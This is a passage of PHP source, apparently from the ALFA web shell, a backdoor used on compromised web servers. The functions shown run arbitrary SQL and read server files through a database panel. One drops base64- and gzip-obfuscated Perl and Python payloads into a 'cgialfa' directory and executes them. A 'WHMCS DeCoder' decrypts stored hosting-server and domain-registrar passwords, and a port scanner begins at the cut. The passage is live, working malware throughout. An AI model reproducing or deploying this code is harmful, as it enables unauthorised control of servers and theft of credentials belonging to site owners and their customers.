6568. echo "<p><input type='checkbox' onclick='is();'> <input type='button' value=' Dump ' onclick=\"fs('4');\" class='button'> <input type='button' value=' Drop ! ' onclick=\"fs('5');\" class='button'></p><div class='txtfont'>File path:</div><input type='text' id='dumpfile' name='file' value='dump.sql'>" . ($dumpStatus ? '<p><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\'dump.sql\', \'download\')"><font color="#0F0">~ Download File ~</font></a></p>' : '') . "</td><td style='border-top:2px solid #666;'>";
6569. if (@$_POST['alfa1'] == 'select')
6570. {
6571. $_POST['alfa1'] = 'query';
6572. $_POST['alfa3'] = $_POST['alfa3'] ? $_POST['alfa3'] : 1;
6573. $db->query('SELECT COUNT(*) as n FROM `' . $_POST['alfa2'] . '`');
6574. $num = $db->fetch();
6575. $pages = ceil($num['n'] / 30);
6576. echo "<span>" . $_POST['alfa2'] . "</span> ({$num['n']} records) Page # <input type=text name='alfa3' value=" . ((int)$_POST['alfa3']) . ">";
6577. echo " of $pages";
6578. if ($_POST['alfa3'] > 1) echo " <a href='javascript:void(0);' onclick=fs('1','[\"" . $_POST['alfa2'] . "\",\"" . ($_POST['alfa3'] - 1) . "\"]')>&lt; Prev</a>";
6579. if ($_POST['alfa3'] < $pages) echo " <a href='javascript:void(0);' onclick=fs('1','[\"" . $_POST['alfa2'] . "\",\"" . ($_POST['alfa3'] + 1) . "\"]')>Next &gt;</a>";
6580. $_POST['alfa3']--;
6581. $cache_table = $_POST['alfa2'];
6582. if ($_POST['type'] == 'pgsql') $_POST['alfa2'] = 'SELECT * FROM `' . $_POST['alfa2'] . '` LIMIT 30 OFFSET ' . ($_POST['alfa3'] * 30);
6583. else $_POST['alfa2'] = 'SELECT * FROM `' . $_POST['alfa2'] . '` LIMIT ' . ($_POST['alfa3'] * 30) . ',30';
6584. echo "<br><br>";
6585. }
6586. if ((@$_POST['alfa1'] == 'query') && !empty($_POST['alfa2']))
6587. {
6588. $prikey = $db->fetch($db->query("SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '" . @addslashes($_POST['sql_base']) . "' AND TABLE_NAME = '" . @addslashes($cache_table) . "' AND COLUMN_KEY = 'PRI'"));
6589. $db->query(@$_POST['alfa2']);
6590. if ($db->res !== false)
6591. {
6592. $title = false;
6593. echo '<table width="100%" cellspacing="1" cellpadding="2" class="main" style="background-color:#292929" border="1">';
6594. $line = 1;
6595. while ($item = $db->fetch())
6596. {
6597. if (!$title)
6598. {
6599. echo '<tr><th>#</th>';
6600. foreach ($item as $key => $value)
6601. {
6602. echo '<th>' . $key . '</th>';
6603. }
6604. reset($item);
6605. $title = true;
6606. echo '</tr><tr>';
6607. $line = 2;
6608. }
6609. if ($cache_table != '')
6610. {
6611. $cacheMsg = '<a href="javascript:void(0);" onclick=fs(\'2\',\'["' . $cache_table . '","' . (!$prikey['COLUMN_NAME'] ? 0 : $prikey['COLUMN_NAME']) . '","' . __ZW5jb2Rlcg(json_encode((!$prikey['COLUMN_NAME'] ? $item : $item[$prikey['COLUMN_NAME']]))) . '"]\')>Edit</a>';
6612. }
6613. else
6614. {
6615. $cacheMsg = '-';
6616. }
6617. echo '<tr class="l' . $line . '"><td>' . $cacheMsg . '</td>';
6618. $line = $line == 1 ? 2 : 1;
6619. foreach ($item as $key => $value)
6620. {
6621. if ($value == null) echo '<td><i>null</i></td>';
6622. else echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>';
6623. }
6624. echo '</tr>';
6625. }
6626. echo '</table>';
6627. }
6628. else
6629. {
6630. echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>';
6631. }
6632. }
6633. echo ('</form>');
6634. if ((@$_POST['alfa1'] == 'edit') && !empty($_POST['alfa2']))
6635. {
6636. $data = explode(':', $_POST['alfa3']);
6637. echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">' . $data[0] . '</font></p>');
6638. echo ("<form onsubmit='fsu(this);return false;'><table border='1'>");
6639. if ($data[1] != '0')
6640. {
6641. $data[2] = __ZGVjb2Rlcg($data[2]);
6642. $data[2] = str_replace('"', '', $data[2]);
6643. $fetch = $db->fetch($db->query("SELECT * FROM `" . $data[0] . "` WHERE `" . $data[1] . "` = '" . $data[2] . "'"));
6644. $fetch['__ALFAKEY'] = $data[1];
6645. $fetch['__ALFAKEYVAL'] = $data[2];
6646. }
6647. else
6648. {
6649. $d = __ZGVjb2Rlcg($data[2]);
6650. $fetch = json_decode($d, true);
6651. }
6652. foreach ($fetch as $key => $value)
6653. {
6654. if ($key == '__ALFAKEY' || $key == '__ALFAKEYVAL') continue;
6655. $value = htmlspecialchars($value);
6656. echo ("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
6657. }
6658. echo ("</table><input type='hidden' name='__ALFADATA' value='" . __ZW5jb2Rlcg(json_encode(($data[1] != '0' ? array(
6659. '__ALFAKEY' => $data[1],
6660. '__ALFAKEYVAL' => $data[2]
6661. ) : $fetch))) . "'><input type='hidden' name='__ALFATBL' value='{$data[0]}'><input type='submit' value=' '></form>");
6662. }
6663. if ((@$_POST['alfa1'] == 'update') && !empty($_POST['alfa2']))
6664. {
6665. $data = json_decode($_POST['alfa2'], true);
6666. $alfadata = $data['__ALFADATA'];
6667. $data2 = json_decode(__ZGVjb2Rlcg($alfadata) , true);
6668. $keyval = array();
6669. echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">' . $data['__ALFATBL'] . '</font></p>');
6670. echo ("<form onsubmit='fsu(this);return false;'><table border='1'>");
6671. $set = '';
6672. foreach ($data as $key => $value)
6673. {
6674. if ($key == '__ALFATBL' || $key == '__ALFADATA') continue;
6675. if ($data2['__ALFAKEY'] == $key)
6676. {
6677. $keyval['__ALFAKEY'] = $key;
6678. $keyval['__ALFAKEYVAL'] = $value;
6679. }
6680. $set .= "`$key` = '" . addslashes($value) . "',";
6681. $value = htmlspecialchars($value);
6682. echo ("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
6683. }
6684. unset($data['__ALFADATA']);
6685. echo ("</table><input type='hidden' name='__ALFADATA' value='" . __ZW5jb2Rlcg(json_encode((isset($data2['__ALFAKEY']) ? array(
6686. '__ALFAKEY' => $keyval['__ALFAKEY'],
6687. '__ALFAKEYVAL' => $keyval['__ALFAKEYVAL']
6688. ) : $data))) . "'><input type='hidden' name='__ALFATBL' value='{$data['__ALFATBL']}'><input type='submit' value=' '></form>");
6689. if (!isset($data2['__ALFAKEY']))
6690. {
6691. $where = '';
6692. foreach ($data2 as $key => $value)
6693. {
6694. if ($key == '__ALFATBL' || $key == '__ALFADATA') continue;
6695. $value = addslashes($value);
6696. $where .= "`$key` = '$value' AND ";
6697. }
6698. $where = substr($where, 0, -4);
6699. }
6700. else
6701. {
6702. $where = "`{$data2['__ALFAKEY']}` = '" . addslashes($data2['__ALFAKEYVAL']) . "'";
6703. }
6704. $set = substr($set, 0, -1);
6705. $db->fetch($db->query("UPDATE `{$data['__ALFATBL']}` SET $set WHERE $where"));
6706. if ($db->error()) echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>';
6707. else echo ("Success...!");
6708. }
6709. if ($_POST['alfa1'] != 'edit' && $_POST['alfa1'] != 'update')
6710. {
6711. echo "<p>Query:</p><form onsubmit='fs(this);return false;'>
6712. <input type='hidden' name='alfa1' value='query'/>
6713. <textarea name='query' style='width:100%;height:100px'>";
6714. echo $_POST['alfa1'] != 'loadfile' ? htmlspecialchars($_POST['alfa2']) : '';
6715. echo "</textarea><p><center><input type=submit value=' '></center></p></form>";
6716. }
6717. echo "</td></tr>";
6718. }
6719. echo "</table></form><br/>";
6720. if ($_POST['type'] == 'mysql')
6721. {
6722. $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
6723. if ($db->fetch()) echo "<form onsubmit=\"fs('3',this.f.value);return false;\"><div class='txtfont'>Load file:</div> <input class='toolsInp' type='text' name='f'> <input type='submit' value=' '></form>";
6724. }
6725. if (@$_POST['alfa1'] == 'loadfile')
6726. {
6727. $file = $db->loadFile($_POST['alfa2']);
6728. echo '<pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>';
6729. }
6730. }
6731. else
6732. {
6733. echo htmlspecialchars($db->error());
6734. }
6735. echo '</div>';
6736. alfafooter();
6737. }
6738. function alfaselfrm()
6739. {
6740. if (isset($_POST['alfa1']) && $_POST['alfa1'] == 'yes')
6741. {
6742. echo (__pre() . '<center>');
6743. if (@unlink($GLOBALS['__file_path']))
6744. {
6745. echo ('<b>Shell has been removed</i> :)</b>');
6746. }
6747. else
6748. {
6749. echo 'unlink error!';
6750. }
6751. echo ('</center>');
6752. }
6753. if (isset($_POST['alfa1']) && $_POST['alfa1'] != 'yes')
6754. {
6755. echo "<div class=header>";
6756. echo "
6757. <center><p><img src=\"http://solevisible.com/images/farvahar-iran.png\"></p>";
6758. echo '<p><div class="txtfont">Do you want to destroy me?!</div><a href=javascript:void(0) onclick="g(\'selfrm\',null,\'yes\');"> Yes</a>';
6759. echo '</p></center></div>';
6760. }
6761. }
6762. function alfacgishell()
6763. {
6764. alfahead();
6765. $div = "";
6766. if (!in_array($_POST['alfa1'], array(
6767. 'perl',
6768. 'py'
6769. )))
6770. {
6771. $div = "</div>";
6772. echo '<div class=header><center><p><div class="txtfont_header">| CGI Shell |</div></p><h3><a href=javascript:void(0) onclick="runcgi(\'perl\')">| Perl | </a><a href=javascript:void(0) onclick="runcgi(\'py\');">| Python | </a>';
6773. }
6774. if (isset($_POST['alfa1']) && in_array($_POST['alfa1'], array(
6775. 'perl',
6776. 'py'
6777. )))
6778. {
6779. @mkdir('cgialfa', 0755);
6780. @chdir('cgialfa');
6781. alfacgihtaccess('cgi');
6782. $name = $_POST['alfa1'] . '.alfa';
6783. $perl = '#!/usr/bin/perl -I/usr/local/bandmin' . "\n" . 'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));';;
6784. $py = '#!/usr/bin/python' . "\nimport zlib, base64\n" . 'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
6785. if ($_POST['alfa1'] == 'perl')
6786. {
6787. $code = $perl;
6788. }
6789. else
6790. {
6791. $code = $py;
6792. }
6793. if (__write_file($name, $code))
6794. {
6795. @chmod($name, 0755);
6796. echo '<iframe src="' . 'cgialfa/' . $name . '" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>';
6797. }
6798. }
6799. echo $div;
6800. alfafooter();
6801. }
6802. function alfaWhmcs()
6803. {
6804. alfahead();
6805. echo '<div class=header>';
6806. function decrypt($string, $cc_encryption_hash)
6807. {
6808. $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
6809. $hash_key = _hash($key);
6810. $hash_length = strlen($hash_key);
6811. $string = __ZGVjb2Rlcg($string);
6812. $tmp_iv = substr($string, 0, $hash_length);
6813. $string = substr($string, $hash_length, strlen($string) - $hash_length);
6814. $iv = $out = '';
6815. $c = 0;
6816. while ($c < $hash_length)
6817. {
6818. $iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
6819. ++$c;
6820. }
6821. $key = $iv;
6822. $c = 0;
6823. while ($c < strlen($string))
6824. {
6825. if (($c != 0 and $c % $hash_length == 0))
6826. {
6827. $key = _hash($key . substr($out, $c - $hash_length, $hash_length));
6828. }
6829. $out .= chr(ord($key[$c % $hash_length]) ^ ord($string[$c]));
6830. ++$c;
6831. }
6832. return $out;
6833. }
6834. function _hash($string)
6835. {
6836. if (function_exists('sha1'))
6837. {
6838. $hash = sha1($string);
6839. }
6840. else
6841. {
6842. $hash = md5($string);
6843. }
6844. $out = '';
6845. $c = 0;
6846. while ($c < strlen($hash))
6847. {
6848. $out .= chr(hexdec($hash[$c] . $hash[$c + 1]));
6849. $c += 2;
6850. }
6851. return $out;
6852. }
6853. echo "<center><br><div class='txtfont_header'>| WHMCS DeCoder |</div><p>" . getConfigHtml('whmcs') . "</p><form onsubmit=\"g('Whmcs',null,this.form_action.value,'decoder',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value); return false;\">
6854. <input type='hidden' name='form_action' value='2'>";
6855. $table = array(
6856. 'td1' => array(
6857. 'color' => 'FFFFFF',
6858. 'tdName' => 'db_host : ',
6859. 'inputName' => 'db_host',
6860. 'id' => 'db_host',
6861. 'inputValue' => 'localhost',
6862. 'inputSize' => '50'
6863. ) ,
6864. 'td2' => array(
6865. 'color' => 'FFFFFF',
6866. 'tdName' => 'db_username : ',
6867. 'inputName' => 'db_username',
6868. 'id' => 'db_user',
6869. 'inputValue' => '',
6870. 'inputSize' => '50'
6871. ) ,
6872. 'td3' => array(
6873. 'color' => 'FFFFFF',
6874. 'tdName' => 'db_password : ',
6875. 'inputName' => 'db_password',
6876. 'id' => 'db_pw',
6877. 'inputValue' => '',
6878. 'inputSize' => '50'
6879. ) ,
6880. 'td4' => array(
6881. 'color' => 'FFFFFF',
6882. 'tdName' => 'db_name : ',
6883. 'inputName' => 'db_name',
6884. 'id' => 'db_name',
6885. 'inputValue' => '',
6886. 'inputSize' => '50'
6887. ) ,
6888. 'td5' => array(
6889. 'color' => 'FFFFFF',
6890. 'tdName' => 'cc_encryption_hash : ',
6891. 'inputName' => 'cc_encryption_hash',
6892. 'id' => 'cc_encryption_hash',
6893. 'inputValue' => '',
6894. 'inputSize' => '50'
6895. )
6896. );
6897. create_table($table);
6898. echo "<p><input type='submit' value=' ' name='Submit'></p></form></center>";
6899. if ($_POST['alfa5'] != '')
6900. {
6901. $db_host = ($_POST['alfa7']);
6902. $db_username = ($_POST['alfa3']);
6903. $db_password = ($_POST['alfa4']);
6904. $db_name = ($_POST['alfa5']);
6905. $cc_encryption_hash = ($_POST['alfa6']);
6906. echo __pre();
6907. $conn = @mysqli_connect($db_host, $db_username, $db_password, $db_name) or die(mysqli_error($conn));
6908. $query = mysqli_query($conn, "SELECT * FROM tblservers");
6909. $num = mysqli_num_rows($query);
6910. if ($num > 0)
6911. {
6912. for ($i = 0;$i <= $num - 1;$i++)
6913. {
6914. $v = @mysqli_fetch_array($query);
6915. $ipaddress = $v['ipaddress'];
6916. $username = $v['username'];
6917. $type = $v['type'];
6918. $active = $v['active'];
6919. $hostname = $v['hostname'];
6920. echo ("<center><table border='1'>");
6921. $password = decrypt($v['password'], $cc_encryption_hash);
6922. echo ("<tr><td><b><font color=\"#FFFFFF\">Type</font></td><td>$type</td></tr></b>");
6923. echo ("<tr><td><b><font color=\"#FFFFFF\">Active</font></td><td>$active</td></tr></b>");
6924. echo ("<tr><td><b><font color=\"#FFFFFF\">Hostname</font></td><td>$hostname</td></tr></b>");
6925. echo ("<tr><td><b><font color=\"#FFFFFF\">Ip</font></td><td>$ipaddress</td></tr></b>");
6926. echo ("<tr><td><b><font color=\"#FFFFFF\">Username</font></td><td>$username</td></tr></b>");
6927. echo ("<tr><td><b><font color=\"#FFFFFF\">Password</font></td><td>$password</td></tr></b>");
6928. echo "</table><br><br></center>";
6929. }
6930. $query1 = @mysqli_query($conn, "SELECT * FROM tblregistrars");
6931. $num1 = @mysqli_num_rows($query1);
6932. if ($num1 > 0)
6933. {
6934. for ($i = 0;$i <= $num1 - 1;$i++)
6935. {
6936. $v = mysqli_fetch_array($query1);
6937. $registrar = $v['registrar'];
6938. $setting = $v['setting'];
6939. $value = decrypt($v['value'], $cc_encryption_hash);
6940. if ($value == "")
6941. {
6942. $value = 0;
6943. }
6944. echo ("<center>Domain Reseller <br><center>");
6945. echo ("<center><table border='1'>");
6946. echo ("<tr><td><b><font color=\"#67ABDF\">Register</font></td><td>$registrar</td></tr></b>");
6947. echo ("<tr><td><b><font color=\"#67ABDF\">Setting</font></td><td>$setting</td></tr></b>");
6948. echo ("<tr><td><b><font color=\"#67ABDF\">Value</font></td><td>$value</td></tr></b>");
6949. echo "</table><br><br></center>";
6950. }
6951. }
6952. }
6953. else
6954. {
6955. __alert('<font color="red">tblservers is Empty...!</font>');
6956. };
6957. }
6958. echo "</div>";
6959. alfafooter();
6960. }
6961. function alfaportscanner()
6962. {
6963. alfahead();
6964. echo '<div class=header><center><p><div class="txtfont_header">| Port Scaner |</div></p>
6965. <form action="" method="post" onsubmit="g(\'portscanner\',null,null,this.start.value,this.end.value,this.host.value); return false;">
6966. <input type="hidden" name="y" value="phptools">
6967. <div class="txtfont">Host: </div> <input id="text" type="text" name="host" value="localhost"/>
6968. <div class="txtfont">Port start: </div> <input id="text" size="5" type="text" name="start" value="80"/>
6969. <div class="txtfont">Port end: </div> <input id="text" size="5" type="text" name="end" value="80"/> <input type="submit" value=" " />
6970. </form></center><br>';
6971. $start = strip_tags($_POST['alfa2']);
6972. $end = strip_tags($_POST['alfa3']);
6973. $host = strip_tags($_POST['alfa4']);
6974. if (isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2']))
6975. {
6976. echo __pre();
6977. $packetContent = "GET / HTTP/1.1\r\n\r\n";
6978. if (ctype_xdigit($packetContent)) $packetContent = @pack("H*", $packetContent);
6979. else
6980. {
6981. $packetContent = str_replace(array(
6982. "\r",
6983. "\n"
6984. ) , "", $packetContent);
6985. $packetContent = str_replace(array(
6986. "\\r",
6987. "\\n"
6988. ) , array(
6989. "\r",
6990. "\n"
6991. ) , $packetContent);
6992. }
6993. for ($i = $start;$i <= $end;$i++)
6994. {
6995. $sock = @fsockopen($host, $i, $errno, $errstr, 3);
6996. if ($sock)
6997. {
